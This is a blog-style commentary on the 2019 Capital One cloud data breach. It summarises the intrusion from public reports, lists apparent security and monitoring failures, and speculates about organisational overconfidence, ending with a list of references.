Earlier this week on July 29, FBI agents arrested Paige “erratic” Thompson related to downloading ~30 GB of Capital One credit application data from a rented cloud data server.
In a statement to the FBI, Capital One reported that an intruder executed a command that retrieved the security credentials for a web application firewall administrator account, used those credentials to list the names of data folders/buckets, and then to copy (sync) them to buckets controlled by the attacker. The incident appears to have affected approximately 100 million people in the United States and six million in Canada.
If you just want to read a quick summary of the incident, try “For Big Banks, It’s an Endless Fight With Hackers.” or “Capital One says data breach affected 100 million credit card applications.”
I just can’t resist offering some observations, speculation, and opinions on this topic.
Since as early as 2015 the Capital One CIO has hyped their being first to cloud, their cloud journey, their cloud transformation and have asserted that their customers data was more secure in the cloud than in their private data centers. Earlier this year the company argued that moving to AWS will “strengthen your security posture” and highlighted their ability to “reduce the impact of compliance on developers” (22:00) — using AWS security services and the network of AWS security partners — software engineers and security engineers “should be one in the same.”(9:34)
I assume that this wasn’t an IT experiment, but an expression of a broader Capital One corporate culture, their values and ethics. I also assume that there was/is some breakdown in their engineering assumptions about how their cloud infrastructure and its operations worked. How does this happen? Given the information available to me today, I wonder about the role of malignant group-think & echo chamber at work or some shared madness gripping too many levels of Capital One management. Capital One has to have hordes of talented engineers — some of whom had to be sounding alarms about the risks associated with their execution on this ‘cloud first‘ mission (I assume they attempted to communicate that it was leaving them open to accusations of ‘mismanaging customer data’, ‘inaccurate corporate communications,’ excessive risk appetite, and more). There were lots of elevated risk decisions that managers (at various levels) needed to authorize…
Based on public information, it appears that:
- The sensitive data was stored in a way that it could be read from the “local instance” in clear text (ineffective or absent encryption).
- The sensitive data was stored on a cloud version of a file system, not a database (weaker controls, weaker monitoring options).
- The sensitive data was gathered by Capital One starting in 2005 — which suggests gaps in their data life-cycle management (ineffective or absent data life-cycle management controls)
- There were no effective alerts or alarms announcing unauthorized access to the sensitive data (ineffective or absent IAM monitoring/alerting/alarming).
- There were no effective alerts or alarms announcing ‘unexpected’ or out-of-specification traffic patterns (ineffective or absent data communications or data flow monitoring/alerting/alarming).
- There were no effective alerts or alarms announcing social media, forums, dark web, etc. chatter about threats to Capital One infrastructure/data/operations/etc. (ineffective or absent threat intelligence monitoring & analysis, and follow-on reporting/alerting/alarming).
- Capital One’s conscious program to “reduce the compliance burden that we put on our developers” (28:23) may have obscured architectural, design, and/or implementation weaknesses from Capital One developers (a lack of security transparency, possibly overconfidence that developers understood their risk management obligations, and possible weaknesses in their secure software program).
- Capital One ‘wrapped’ a gap in IAM vendor Sailpoint’s platform with custom integrations to AWS identity infrastructure (16:19) (potentially increasing the risk of misunderstanding or omission in this identity & access management ‘plumbing’).
- There may have been application vulnerabilities that permitted the execution of server side commands (ineffective input validation, scrubbing, etc. and possibly inappropriate application design, and possible weaknesses in their secure code review practices and secure software training).
- There may have been infrastructure configuration decisions that permitted elevated rights access to local instance meta-data (ineffective configuration engineering and/or implementation).
- There must be material gaps or weaknesses in Capital One’s architecture risk assessment practices or in how/where they are applied, and/or they must have been incomplete, ineffective, or worse for a long time.
- And if this was the result of ‘designed-in‘ or systemic weaknesses at Capital One, there seems to be room for questions about their SEC filings about the effectiveness of their controls supportable by the facts of their implementation and operational practices.
In almost any context this is a pretty damning list. Most of these are areas where global financial services enterprises are supposed to be experts.
Aren’t there also supposed to be internal systems in place to ensure that each financial services enterprise achieves risk-reasonable levels of excellence in each of the areas mentioned in the bullets above? And where were the regulations & regulators that play a role in assuring that it the case?
How does an enormous, heavily-regulated financial services enterprise get into a situation like this? There is a lot of psychological research suggesting that overconfidence is a widespread cognitive bias and I’ve read, for example, that it underpins what is sometimes called ‘organizational hubris,’ which seems like a useful label here. The McCombs School of Business Ethics Unwrapped program defines ‘overconfidence bias’ as “the tendency people have to be more confident in their own abilities than is objectively reasonable.” That also seems like a theme applicable to this situation. Given my incomplete view of the facts, it seems like this may have been primarily a people problem, and only secondarily a technology problem. There is probably no simple answer…
Is the Capital One case unique? Could other financial services enterprises be on analogous journeys?
REFERENCES:
“Capital One Data Theft Impacts 106M People.” By Brian Krebs. https://krebsonsecurity.com/2019/07/capital-one-data-theft-impacts-106m-people/
“Why did we pick AWS for Capital One? We believe we can operate more securely in their cloud than in our own data centers.” By Rob Alexander, CIO, Capital One, https://aws.amazon.com/campaigns/cloud-transformation/capital-one/ and https://youtu.be/0E90-ExySb8?t=212
“For Big Banks, It’s an Endless Fight With Hackers.” By Stacy Cowley and Nicole Perlroth, 30 July 2019. https://www.nytimes.com/2019/07/30/business/bank-hacks-capital-one.html
“Capital One says data breach affected 100 million credit card applications.” By Devlin Barrett. https://www.washingtonpost.com/national-security/capital-one-data-breach-compromises-tens-of-millions-of-credit-card-applications-fbi-says/2019/07/29/…
“AWS re:Inforce 2019: Capital One Case Study: Addressing Compliance and Security within AWS (FND219)” https://youtu.be/HJjhfmcrq1s
“Capital One Data Theft Impacts 106M People.” https://krebsonsecurity.com/2019/07/capital-one-data-theft-impacts-106m-people/
“Frequently Asked Questions.” https://www.capitalone.com/facts2019/2/
Overconfidence Bias defined: https://ethicsunwrapped.utexas.edu/glossary/overconfidence-bias
Scholarly articles for cognitive bias overconfidence: https://scholar.google.com/scholar?hl=en&as_sdt=1,16&as_vis=1&q=cognitive+bias+overconfidence&scisbd=1
“How to Recognize (and Cure) Your Own Hubris.” By John Baldoni. https://hbr.org/2010/09/how-to-recognize-and-cure-your